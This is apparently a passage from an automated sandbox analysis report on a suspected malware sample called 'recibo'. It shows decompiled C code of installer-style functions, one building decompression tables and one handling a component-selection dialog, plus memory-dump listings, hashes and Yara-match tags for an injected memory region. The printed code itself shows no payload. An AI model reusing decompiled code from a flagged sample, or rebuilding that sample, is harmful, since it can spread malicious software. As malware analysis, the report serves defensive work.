						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x432190;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x432190 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                  0x00407567
                                                                                  0x0040756f
                                                                                  0x00407573
                                                                                  0x00407575
                                                                                  0x00407578
                                                                                  0x0040757a
                                                                                  0x0040757a
                                                                                  0x0040757c
                                                                                  0x00407583
                                                                                  0x00407585
                                                                                  0x00407585
                                                                                  0x0040758b
                                                                                  0x004075a0
                                                                                  0x004075a8
                                                                                  0x004075aa
                                                                                  0x004075ac
                                                                                  0x004075af
                                                                                  0x004075b0
                                                                                  0x004075b0
                                                                                  0x004075b6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004075b8
                                                                                  0x004075bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004075bb
                                                                                  0x004075bf
                                                                                  0x004075c2
                                                                                  0x004075c4
                                                                                  0x004075c4
                                                                                  0x004075c7
                                                                                  0x004075cd
                                                                                  0x004075ce
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004075ce
                                                                                  0x004075d3
                                                                                  0x004075d6
                                                                                  0x004075d8
                                                                                  0x004075d8
                                                                                  0x004075de
                                                                                  0x004075e0
                                                                                  0x004075f1
                                                                                  0x004075e4
                                                                                  0x004075e8
                                                                                  0x0040788d
                                                                                  0x00000000
                                                                                  0x0040788d
                                                                                  0x004075ee
                                                                                  0x004075ef
                                                                                  0x004075ef
                                                                                  0x004075f7
                                                                                  0x004075fa
                                                                                  0x004075fe
                                                                                  0x00407600
                                                                                  0x00407602
                                                                                  0x00407605
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040760d
                                                                                  0x00407613
                                                                                  0x00407615
                                                                                  0x00407617
                                                                                  0x00407618
                                                                                  0x0040762d
                                                                                  0x0040762d
                                                                                  0x00407630
                                                                                  0x00407632
                                                                                  0x00407632
                                                                                  0x00407634
                                                                                  0x00407639
                                                                                  0x0040763b
                                                                                  0x00407642
                                                                                  0x00407644
                                                                                  0x0040764c
                                                                                  0x0040764c
                                                                                  0x0040764e
                                                                                  0x0040764f
                                                                                  0x0040765e
                                                                                  0x00407662
                                                                                  0x00407666
                                                                                  0x00407669
                                                                                  0x0040766c
                                                                                  0x00407671
                                                                                  0x00407674
                                                                                  0x0040767a
                                                                                  0x00407681
                                                                                  0x00407687
                                                                                  0x00407880
                                                                                  0x00407880
                                                                                  0x00407885
                                                                                  0x00407894
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407885
                                                                                  0x00407694
                                                                                  0x00407697
                                                                                  0x0040769a
                                                                                  0x0040769d
                                                                                  0x004076a1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076ac
                                                                                  0x004076af
                                                                                  0x004076b0
                                                                                  0x004076b2
                                                                                  0x004076b8
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076c1
                                                                                  0x004076c2
                                                                                  0x004076c5
                                                                                  0x004076c8
                                                                                  0x004076cb
                                                                                  0x004076d1
                                                                                  0x004076d3
                                                                                  0x004076d3
                                                                                  0x004076db
                                                                                  0x004076df
                                                                                  0x004076e4
                                                                                  0x00407709
                                                                                  0x0040770f
                                                                                  0x00407711
                                                                                  0x00407713
                                                                                  0x00407716
                                                                                  0x0040771f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076e6
                                                                                  0x004076e6
                                                                                  0x004076ef
                                                                                  0x004076f3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407704
                                                                                  0x00407704
                                                                                  0x00407707
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076f7
                                                                                  0x004076fa
                                                                                  0x004076fc
                                                                                  0x00407700
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407702
                                                                                  0x00407702
                                                                                  0x00000000
                                                                                  0x00407704
                                                                                  0x00407728
                                                                                  0x0040772e
                                                                                  0x00407738
                                                                                  0x0040773a
                                                                                  0x0040773f
                                                                                  0x00407741
                                                                                  0x00407777
                                                                                  0x00407743
                                                                                  0x00407743
                                                                                  0x00407746
                                                                                  0x00407749
                                                                                  0x00407753
                                                                                  0x00407756
                                                                                  0x0040775d
                                                                                  0x00407768
                                                                                  0x0040776f
                                                                                  0x0040776f
                                                                                  0x00407779
                                                                                  0x0040777c
                                                                                  0x0040777e
                                                                                  0x00407784
                                                                                  0x00407784
                                                                                  0x0040778d
                                                                                  0x00407790
                                                                                  0x00407795
                                                                                  0x004077a4
                                                                                  0x004077ac
                                                                                  0x004077b1
                                                                                  0x004077d5
                                                                                  0x004077dd
                                                                                  0x004077e1
                                                                                  0x004077e7
                                                                                  0x004077b3
                                                                                  0x004077c1
                                                                                  0x004077c4
                                                                                  0x004077ca
                                                                                  0x004077ca
                                                                                  0x004077eb
                                                                                  0x004077a6
                                                                                  0x004077a6
                                                                                  0x004077a6
                                                                                  0x004077fc
                                                                                  0x00407800
                                                                                  0x0040780c
                                                                                  0x00407807
                                                                                  0x0040780a
                                                                                  0x0040780a
                                                                                  0x00407814
                                                                                  0x00407819
                                                                                  0x00407821
                                                                                  0x0040781d
                                                                                  0x0040781f
                                                                                  0x0040781f
                                                                                  0x00407827
                                                                                  0x00407829
                                                                                  0x00407830
                                                                                  0x0040783a
                                                                                  0x00407844
                                                                                  0x00407860
                                                                                  0x00407864
                                                                                  0x004076a9
                                                                                  0x004076af
                                                                                  0x004076b0
                                                                                  0x004076b2
                                                                                  0x004076b8
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004076bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407846
                                                                                  0x00407846
                                                                                  0x00407846
                                                                                  0x0040784b
                                                                                  0x00407854
                                                                                  0x0040785d
                                                                                  0x00000000
                                                                                  0x0040785d
                                                                                  0x0040786a
                                                                                  0x0040786a
                                                                                  0x0040786d
                                                                                  0x00407874
                                                                                  0x00407877
                                                                                  0x00000000
                                                                                  0x0040769a
                                                                                  0x0040761a
                                                                                  0x0040761c
                                                                                  0x0040761c
                                                                                  0x00407620
                                                                                  0x00407623
                                                                                  0x00407624
                                                                                  0x00407624
                                                                                  0x00000000
                                                                                  0x0040761c
                                                                                  0x00407590
                                                                                  0x00407596
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                  • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                                  • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                                  • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0F20 Relevance: .3, Instructions: 265COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de714dff64dc0ff7994a5a7ce56d8f94d438fe6a360eb2450c80f19d4ad8ff10
                                                                                  • Instruction ID: a96bed59c20f9a2e96ee8204495dc35e13aa311cda4ca740adbcfdf2694ebb67
                                                                                  • Opcode Fuzzy Hash: de714dff64dc0ff7994a5a7ce56d8f94d438fe6a360eb2450c80f19d4ad8ff10
                                                                                  • Instruction Fuzzy Hash: 3261AE45E2D30AC9DB53207785B53E61386CF272C1E668B6BCC6B73855B31B098E85C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB12C7 Relevance: .2, Instructions: 207COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ccbd1f4e5a00f0189e3656c48ca2a2d54ad0f00f7e3a15ed49af5921d80c081c
                                                                                  • Instruction ID: c260d4ee85eb8582a88baa6a79769e0ba625ae13d15c3f85831762222dd24731
                                                                                  • Opcode Fuzzy Hash: ccbd1f4e5a00f0189e3656c48ca2a2d54ad0f00f7e3a15ed49af5921d80c081c
                                                                                  • Instruction Fuzzy Hash: 9A41921E91CB8A85FE33247E49F53E6124EEF937F0D4D521ACC9E53C04B7864A498943
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB808C Relevance: .1, Instructions: 149COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fb5a898b22ff13c3f77d876587266ad02566f13c4898a89dc86018d70388faae
                                                                                  • Instruction ID: f12689b630405b2dd80f11ca984365b1c4776fd42249f89be84f70223ae15452
                                                                                  • Opcode Fuzzy Hash: fb5a898b22ff13c3f77d876587266ad02566f13c4898a89dc86018d70388faae
                                                                                  • Instruction Fuzzy Hash: 3A516B35A013449BCF3B8D25CD753DA3797AF85324F59432BCD095B168C7728A85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC4F6B Relevance: .1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: abd8d493d4c9245c03a0168a93d28a740dc6a5a152fda197c5176251f2a542c1
                                                                                  • Instruction ID: f62a9a76eaecb39c09bf61308b68053ca576c29cd71b6121fd54b3555d7dfc02
                                                                                  • Opcode Fuzzy Hash: abd8d493d4c9245c03a0168a93d28a740dc6a5a152fda197c5176251f2a542c1
                                                                                  • Instruction Fuzzy Hash: 0A41BE71A013048FDF394E749DA87D93793AF82250FA6822FDC468B649D7724B4ACB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB8130 Relevance: .1, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4427751099bf3244b6ca39b4789a78e169a9a3e2505fbdc5a385ef1cd0743cbc
                                                                                  • Instruction ID: 0233c20c29591e0f60bd75ff4e7308a17197b1bb9652eb1db7d573e5ba31d0de
                                                                                  • Opcode Fuzzy Hash: 4427751099bf3244b6ca39b4789a78e169a9a3e2505fbdc5a385ef1cd0743cbc
                                                                                  • Instruction Fuzzy Hash: 75412531600389ABDF35CE798EA57DA33A7EF91360F95822ECD4A9B540D7704685CF12
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB816A Relevance: .1, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7523e248f9700a9ba81476bb13b3b7f40fc467252313e0652e718ec9fab7fbd6
                                                                                  • Instruction ID: c09b0bbc6ecab87d1093d08fd10d81963f83beaa225070e6e1da297f6b4a9fa0
                                                                                  • Opcode Fuzzy Hash: 7523e248f9700a9ba81476bb13b3b7f40fc467252313e0652e718ec9fab7fbd6
                                                                                  • Instruction Fuzzy Hash: 56412435A41388EBDF3A8E35CDA67DA37A7EF81324F59422ACD499B054D7714682CF02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB4544 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40e409b54bb781c50c91079011a45974c1f771ae1ef819c1e26508a952197481
                                                                                  • Instruction ID: c08088aa251b81d1a47d54604c46fcc59735e773da50f132243119c7ef4aa59a
                                                                                  • Opcode Fuzzy Hash: 40e409b54bb781c50c91079011a45974c1f771ae1ef819c1e26508a952197481
                                                                                  • Instruction Fuzzy Hash: 9AE0C0E5C54364CBC606ABA1E0341CC3FA39F2F220B0D1CCAC8C65B106EA22C895DB12
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 96%
                                                                                  			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				intOrPtr _t202;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x434f28;
				_v28 =  *0x434f10 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x434f19 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E54(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x5c09b6
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
